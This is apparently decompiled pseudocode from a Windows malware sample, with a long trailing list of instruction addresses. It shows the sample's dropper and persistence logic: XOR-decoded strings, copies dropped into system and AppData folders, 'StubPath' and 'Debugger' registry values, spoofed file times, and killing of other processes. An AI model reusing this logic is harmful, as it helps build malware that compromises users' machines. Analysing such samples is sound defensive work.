												__eflags = _t732 - 0xffffffff;
												if(_t732 == 0xffffffff) {
													goto L158;
												}
												WriteFile(_t732, 0x4072a0, 0x800,  &(_t1021[0x28]), 0);
												_t737 = E004010B2();
												_t1021[6] = _t737;
												__eflags = _t737;
												if(_t737 == 0) {
													_t1021[6] = 0xc6;
												}
												_t739 = E00401000(_t1017 + 0x64);
												 *((char*)(_t739 + _t1017)) = 0;
												_t990 = _t739;
												_t1006 = _t739;
												_t978 = _t1021[5];
												_t740 = _t739 + _t1017;
												while(1) {
													__eflags = _t1006 - _t740;
													if(_t1006 >= _t740) {
														break;
													}
													_t765 = _t1021[6] & 0x000000ff ^  *_t978;
													_t978 =  &(_t978[0]);
													 *_t1006 = _t765;
													_t1006 = _t1006 + 1;
													_t740 = _t990 + _t1017;
												}
												_t741 =  &(_t1021[0x55a]);
												_t914 = _t990 + _t1017;
												_push(_t741);
												L00405E40();
												_t1007 = _t914 +  &(_t741[1]);
												__eflags = _t1007 - _t914 + 0x64;
												while(__eflags < 0) {
													 *_t1007 = E004010B2();
													_t1007 = _t1007 + 1;
													_t194 = _t1017 + 0x64; // 0x64
													__eflags = _t1007 - _t990 + _t194;
												}
												 *(_t990 + _t1017 + 1) = _t1017;
												_t916 = _t990 + _t1017;
												_push( &(_t1021[0x55a]));
												_t1008 = _t916;
												_push( &(_t916[1]));
												L00405E20();
												_t744 =  &(_t916[0x19]);
												while(1) {
													__eflags = _t1008 - _t744;
													if(_t1008 >= _t744) {
														break;
													}
													 *_t1008 =  *_t1008 ^ _t1021[6] & 0x000000ff;
													_t1008 =  &(_t1008[0]);
													_t203 = _t1017 + 0x64; // 0x64
													_t744 = _t990 + _t203;
												}
												WriteFile(_t1021[0x2c], _t990, _t1017 + 0x64,  &(_t1021[0x28]), 0);
												E00401029(_t990);
												__eflags = _t1021[3];
												if(_t1021[3] != 0) {
													SetFileTime(_t1021[0x2b],  &(_t1021[0x21]),  &(_t1021[0x22]),  &(_t1021[0x23]));
												}
												CloseHandle(_t1021[0x28]);
												_t917 =  &(_t1021[0x3d0]);
												CreateFileA(_t917, 0x80000000, 1, 0, 3, 0, 0);
												E00401251(_t1021[0x26]);
												_t1021[0x27] = 1;
												_t754 = RegSetValueExA(_t1021[0x2b], "IsInstalled", 0, 4,  &(_t1021[0x28]), 4);
												_push(_t917);
												L00405E40();
												_t755 = _t754 + 1;
												__eflags = _t755;
												RegSetValueExA(_t1021[0x2b], "StubPath", 0, 1, _t917, _t755);
												_t1021[0xa] = 1;
												goto L158;
											}
										}
										__eflags =  *((char*)(_t1020 + 0x1e8));
										if( *((char*)(_t1020 + 0x1e8)) != 0) {
											_push(_t887);
											_t768 = _t1020 + 0x1bc;
											_push(_t768);
											L00405E20();
											while(1) {
												_t918 = _t1020 + 0x1b8;
												_push(_t918);
												L00405E40();
												__eflags = _t768 - 0xf;
												if(_t768 > 0xf) {
													goto L128;
												}
												_t768 = _t1020 + 0x1e8;
												_push(_t768);
												_push(_t918);
												L00405E30();
											}
											goto L128;
										}
										goto L124;
									}
									_t770 = RegCreateKeyA(0x80000002, 0x408720, _t1020 + 0x98);
									__eflags = _t770;
									if(_t770 != 0) {
										goto L122;
									}
									_t919 = _t1020 + 0x123c;
									_t771 = GetSystemDirectoryA(_t919, 0x104);
									_push( *0x4120a0);
									_push(0x41103e);
									_push(_t919);
									L00405E30();
									_push(_t771);
									L00405E30();
									_t772 = 0x407ae0;
									while(1) {
										__eflags = _t772 - 0x407b06;
										if(_t772 >= 0x407b06) {
											break;
										}
										 *_t772 =  *_t772 ^ 0x000000d4;
										_t772 =  &(_t772[1]);
									}
									_t773 = CreateMutexA(0, 0, 0x407ae0);
									 *(_t1020 + 0xa0) = _t773;
									__eflags = _t773;
									if(_t773 == 0) {
										Sleep(0x7d0);
									} else {
										WaitForSingleObject(_t773, 0x2710);
										CloseHandle( *(_t1020 + 0xa0));
									}
									_t920 = _t1020 + 0x123c;
									SetFileAttributesA(_t920, 0x80);
									_t775 = CreateFileA(_t920, 0x40000000, 0, 0, 2, 0x80, 0);
									 *(_t1020 + 0xa0) = _t775;
									__eflags = _t775;
									if(_t775 == 0) {
										L121:
										RegCloseKey( *(_t1020 + 0x98));
										goto L122;
									} else {
										__eflags = _t775 - 0xffffffff;
										if(_t775 == 0xffffffff) {
											goto L121;
										}
										WriteFile(_t775, 0x407b20, 0xc00, _t1020 + 0xa0, 0);
										_t778 = E004010B2();
										 *(_t1020 + 0x1b) = _t778;
										__eflags = _t778;
										if(_t778 == 0) {
											 *(_t1020 + 0x1b) = 0x66;
										}
										_t780 = E00401000(_t1017 + 0x64);
										 *((char*)(_t780 + _t1017)) = 0;
										_t991 = _t780;
										_t1009 = _t780;
										_t981 =  *(_t1020 + 0x14);
										_t781 = _t780 + _t1017;
										while(1) {
											__eflags = _t1009 - _t781;
											if(_t1009 >= _t781) {
												break;
											}
											_t805 =  *(_t1020 + 0x1b) & 0x000000ff ^  *_t981;
											_t981 =  &(_t981[0]);
											 *_t1009 = _t805;
											_t1009 = _t1009 + 1;
											_t781 = _t991 + _t1017;
										}
										_t782 = _t1020 + 0x1568;
										_t921 = _t991 + _t1017;
										_push(_t782);
										L00405E40();
										_t1010 = _t921 + _t782 + 5;
										__eflags = _t1010 - _t921 + 0x64;
										while(__eflags < 0) {
											 *_t1010 = E004010B2();
											_t1010 = _t1010 + 1;
											_t122 = _t1017 + 0x64; // 0x64
											__eflags = _t1010 - _t991 + _t122;
										}
										 *(_t991 + _t1017 + 1) = _t1017;
										_t923 = _t991 + _t1017;
										_push(_t1020 + 0x1568);
										_t1011 = _t923;
										_push( &(_t923[1]));
										L00405E20();
										_t785 =  &(_t923[0x19]);
										while(1) {
											__eflags = _t1011 - _t785;
											if(_t1011 >= _t785) {
												break;
											}
											 *_t1011 =  *_t1011 ^  *(_t1020 + 0x1b) & 0x000000ff;
											_t1011 =  &(_t1011[0]);
											_t131 = _t1017 + 0x64; // 0x64
											_t785 = _t991 + _t131;
										}
										WriteFile( *(_t1020 + 0xb0), _t991, _t1017 + 0x64, _t1020 + 0xa0, 0);
										E00401029(_t991);
										__eflags =  *(_t1020 + 0xc);
										if( *(_t1020 + 0xc) != 0) {
											SetFileTime( *(_t1020 + 0xac), _t1020 + 0x84, _t1020 + 0x88, _t1020 + 0x8c);
										}
										CloseHandle( *(_t1020 + 0xa0));
										_t924 = _t1020 + 0x1250;
										CreateFileA(_t924, 0x80000000, 1, 0, 3, 0, 0);
										RegDeleteValueA( *(_t1020 + 0x9c), "Debugger");
										_t794 = E00401251( *(_t1020 + 0x98));
										_push(_t924);
										L00405E40();
										_t795 = _t794 + 1;
										__eflags = _t795;
										RegSetValueExA( *(_t1020 + 0xac), "Debugger", 0, 1, _t924, _t795);
										 *(_t1020 + 0x2c) = 1;
										goto L121;
									}
								}
								__eflags = _t454 - 0xffffffff;
								if(_t454 == 0xffffffff) {
									goto L89;
								}
								_t1017 = GetFileSize(_t454, 0);
								 *(_t1020 + 0x14) = E00401000(_t808);
								ReadFile( *(_t1020 + 0xb0),  *(_t1020 + 0x20), _t1017, _t1020 + 0xa0, 0);
								CloseHandle( *(_t1020 + 0xa0));
								goto L90;
							} else {
								_t925 = _t1020 + 0x145c;
								_t813 = GetSystemDirectoryA(_t925, 0x100);
								_push( *0x4120b0);
								_push(0x41103e);
								_push(_t925);
								L00405E30();
								L00405E30();
								_t1012 = _t1020 + 0x1568;
								_t815 = E004010F7(_t1020 + 0x1568, _t925, _t813);
								__eflags = _t815;
								if(_t815 != 0) {
									L74:
									__eflags =  *(_t1020 + 0x20);
									if( *(_t1020 + 0x20) != 0) {
										_t828 = CreateFileA(_t1020 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
										__eflags = _t828;
										_t928 = _t828;
										if(_t828 != 0) {
											__eflags = _t828 - 0xffffffff;
											if(_t828 != 0xffffffff) {
												SetFilePointer(_t828, 0xfffffff0, 0, 2);
												WriteFile(_t928, 0x4120e0, 4, _t1020 + 0xa0, 0);
												CloseHandle(_t928);
											}
										}
									}
									__eflags =  *(_t1020 + 0xc);
									if( *(_t1020 + 0xc) != 0) {
										_t821 = CreateFileA(_t1020 + 0x1470, 0x80000100, 1, 0, 3, 0, 0); // executed
										__eflags = _t821;
										_t927 = _t821;
										if(_t821 != 0) {
											__eflags = _t821 - 0xffffffff;
											if(_t821 != 0xffffffff) {
												SetFileTime(_t927, _t1020 + 0x84, _t1020 + 0x88, _t1020 + 0x8c); // executed
												CloseHandle(_t927);
											}
										}
									}
									_t1013 = _t1020 + 0x145c;
									SetFileAttributesA(_t1013, 0x21); // executed
									CloseHandle( *(_t1020 + 0x10));
									_t926 = _t1020 + 0xb28;
									GetStartupInfoA(_t926);
									_push(_t1020 + 0xb18);
									_push(_t926);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(_t1013); // executed
									CreateProcessA(); // executed
									L84:
									ExitProcess(0); // executed
									L85:
									 *0x412000 = 1;
									goto L86;
								}
								_push(0x104);
								_push(_t925);
								_push( *0x4120b0);
								_push("%CommonProgramFiles%\\System\\");
								_t992 = _t1020 + 0x1358;
								L00405E20();
								L00405E30();
								_t833 = ExpandEnvironmentStringsA(_t815, _t815, _t992);
								__eflags = _t833;
								if(_t833 == 0) {
									L72:
									_push(0x104);
									_push(_t925);
									_push( *0x4120b0);
									_push("%AppData%\\");
									L00405E20();
									L00405E30();
									_t834 = ExpandEnvironmentStringsA(_t833, _t833, _t992);
									__eflags = _t834;
									if(_t834 == 0) {
										goto L85;
									}
									_t836 = E004010F7(_t1012, _t925);
									__eflags = _t836;
									if(_t836 == 0) {
										goto L85;
									}
									goto L74;
								}
								_t833 = E004010F7(_t1012, _t925);
								__eflags = _t833;
								if(_t833 != 0) {
									goto L74;
								}
								goto L72;
							}
						}
						L63:
						CloseHandle( *(_t1020 + 0x10)); // executed
						goto L64;
					}
					__eflags =  *(_t1020 + 0x34) - 0x11;
					if( *(_t1020 + 0x34) > 0x11) {
						__eflags =  *(_t1020 + 0x1c);
						if( *(_t1020 + 0x1c) != 0) {
							goto L84;
						}
						E0040265F(0);
						goto L63;
					}
					_t845 = CreateToolhelp32Snapshot(2, 0);
					__eflags = _t845;
					_t1019 = _t845;
					if(_t845 == 0) {
						L52:
						__eflags =  *(_t1020 + 0x34) - 0xb;
						if( *(_t1020 + 0x34) <= 0xb) {
							_t847 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0x20019, _t1020 + 0x98);
							__eflags = _t847;
							if(_t847 == 0) {
								 *(_t1020 + 0x30) = 0;
								_t849 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778, _t1020 + 0x98, 0);
								__eflags = _t849;
								if(_t849 == 0) {
									 *(_t1020 + 0x9c) = 0x12;
									_t852 = RegQueryValueExA( *(_t1020 + 0xac), "Default Flags", 0, 0, 0x412190, _t1020 + 0x9c);
									__eflags = _t852;
									if(_t852 == 0) {
										_t855 = RegSetValueExA( *(_t1020 + 0xa8), "Default Flags", 0, 3, 0x412190, 0x12);
										__eflags = _t855;
										_t57 = _t855 == 0;
										__eflags = _t57;
										 *(_t1020 + 0x30) = (_t855 & 0xffffff00 | _t57) & 0x000000ff;
									}
									RegCloseKey( *(_t1020 + 0x94));
									__eflags =  *(_t1020 + 0x30);
									if( *(_t1020 + 0x30) == 0) {
										RegDeleteKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy");
									}
								}
								RegCloseKey( *(_t1020 + 0x98));
							}
						}
						goto L63;
					}
					_t859 = E004030DE(_t1020 + 0x1f8);
					 *(_t1020 + 4) = _t859;
					__eflags = _t859;
					if(_t859 == 0) {
						L31:
						_t860 = GetCurrentProcessId();
						 *(_t1020 + 0x428) = 0x128;
						_t929 = _t860;
						_t993 = 0;
						__eflags = 0;
						_t862 = Process32First(_t1019, _t1020 + 0x428);
						while(1) {
							__eflags = _t862;
							if(_t862 == 0) {
								break;
							}
							__eflags =  *(_t1020 + 0x430) - _t929;
							if( *(_t1020 + 0x430) == _t929) {
								L38:
								_t862 = Process32Next(_t1019, _t1020 + 0x428);
								continue;
							}
							_push( *0x4120b0);
							_t872 = E004010DC(_t1020 + 0x450);
							_push(_t872);
							_t1015 = _t872;
							L00405E50();
							__eflags = _t872;
							if(_t872 == 0) {
								L36:
								_t873 = OpenProcess(0x100201, 0,  *(_t1020 + 0x430));
								 *(_t1020 + 0x558 + _t993 * 4) = _t873;
								__eflags = _t873;
								if(_t873 == 0) {
									goto L38;
								}
								_t993 = _t993 + 1;
								__eflags = _t993 - 9;
								if(_t993 > 9) {
									break;
								}
								goto L38;
							}
							_push("winrnt.exe");
							_push(_t1015);
							L00405E50();
							__eflags = _t872;
							if(_t872 != 0) {
								goto L38;
							}
							goto L36;
						}
						_t930 = 0;
						__eflags = 0;
						CloseHandle(_t1019);
						while(1) {
							__eflags = _t930 - _t993;
							if(_t930 >= _t993) {
								break;
							}
							_t930 = _t930 + 1;
							SetPriorityClass( *(_t1020 + 0x55c + _t930 * 4), 0x40);
						}
						_t1014 = 4;
						do {
							_t931 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t931 - _t993;
								if(_t931 >= _t993) {
									goto L46;
								}
								_t931 = _t931 + 1;
								TerminateProcess( *(_t1020 + 0x55c + _t931 * 4), 0);
							}
							L46:
							_t1014 = _t1014 - 1;
							__eflags = _t1014;
						} while (_t1014 >= 0);
						_t932 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t932 - _t993;
							if(_t932 >= _t993) {
								break;
							}
							WaitForSingleObject( *(_t1020 + 0x55c + _t932 * 4), 0x1388);
							_t932 = _t932 + 1;
							CloseHandle( *(_t1020 + 0x558 + _t932 * 4));
						}
						__eflags =  *(_t1020 + 4);
						if( *(_t1020 + 4) != 0) {
							_t933 = _t1020 + 0x21e;
							SetFileAttributesA(_t933, 0x80);
							DeleteFileA(_t933);
						}
						goto L52;
					}
					RegDeleteValueA(_t859, "SubshellState");
					RegCloseKey( *(_t1020 + 4));
					_t1016 = _t1020 + 0x21a;
					_t987 = _t1020 + 0x31e;
					while(1) {
						__eflags = _t1016 - _t987;
						if(_t1016 >= _t987) {
							goto L31;
						}
						 *_t1016 =  *_t1016 ^  *(_t1020 + 0x1f8) & 0x000000ff;
						_t1016 =  &(_t1016[0]);
					}
					goto L31;
					L64:
					 *(_t1020 + 0x34) =  *(_t1020 + 0x34) + 1;
				}
				L11:
				__eflags = _t446 - 0x408818;
				if(_t446 >= 0x408818) {
					_t447 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy";
					goto L15;
				} else {
					 *_t446 =  *_t446 ^ 0x000000d4;
					__eflags =  *_t446;
					_t446 = (_t446 ^ _t947) + 1;
					goto L11;
				}
				L7:
				__eflags = _t430 - 0x40881d;
				if(__eflags >= 0) {
					_t431 =  *0x4120e0; // 0x8ff5b2f0
					 *(_t1020 + 0x9c) = _t431;
					 *0x412090 = E00401F84(".exe", _t1020 + 0x9c, __eflags);
					 *0x4120a0 = E00401F84(".exe", _t1020 + 0x9c, __eflags);
					 *0x4120b0 = E00401F84(".exe", _t1020 + 0x9c, __eflags);
					 *0x4120c0 = E00401F84(".dll", _t1020 + 0x9c, __eflags);
					_t947 = _t1020 + 0x9c;
					_t441 = E00401F84(".dll", _t947, __eflags);
					_push( *0x4120b0);
					 *0x4120d0 = _t441;
					_t443 = E004010DC(_t1020 + 0x156c);
					_push(_t443); // executed
					L00405E50(); // executed
					__eflags = _t443;
					_t13 = _t443 == 0;
					__eflags = _t13;
					 *(_t1020 + 0x1c) = (_t443 & 0xffffff00 | _t13) & 0x000000ff;
					_t446 = "qnd_b__-12";
					goto L11;
				} else {
					 *_t430 =  *_t430 ^ 0x000000d4;
					__eflags =  *_t430;
					_t430 = (_t430 ^ _t942) + 1;
					goto L7;
				}
				L4:
				if(_t429 >= 0x408822) {
					_t430 = ".dll";
					goto L7;
				} else {
					 *_t429 =  *_t429 ^ 0x000000d4;
					_t429 =  &(_t429[1]);
					goto L4;
				}
			}

0x00403e60
0x00403e69
0x00403e86
0x00403e92
0x00403e9e
0x00403ea5
0x00403eaa
0x00403eaa
0x00403e9e
0x00403eb2
0x00403eb2
0x00403f8b
0x00403f8b
0x00403f90
0x00403f92
0x00403f92
0x00403f95
0x00000000
0x00403f95
0x00403f98
0x00403f9d
0x00403f9d
0x00403fa2
0x00000000
0x00000000
0x00403fa4
0x00403fa4
0x00403fa7
0x00403fa7
0x00403faa
0x00403fb2
0x00403fb2
0x00403fc0
0x00403fd1
0x00403fd6
0x00403fda
0x00403fdd
0x00403fdf
0x00000000
0x00000000
0x00403fe5
0x00403fea
0x00403fef
0x0040426e
0x00404273
0x0040428c
0x00404299
0x0040429e
0x004042a0
0x004042b2
0x004042b7
0x004042be
0x004042c1
0x004042c3
0x004042de
0x004042ea
0x004042ef
0x004042ef
0x004042c3
0x004042f7
0x004042fc
0x004044af
0x004044c6
0x004044cb
0x004044d2
0x004044d4
0x00404517
0x00404517
0x0040451f
0x0040451f
0x00404521
0x00404545
0x0040454a
0x0040454f
0x0040454f
0x00404554
0x00000000
0x00000000
0x00404556
0x00404559
0x00404559
0x00404561
0x00404561
0x00404566
0x00000000
0x00000000
0x00404568
0x00404568
0x00404569
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404dc7
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
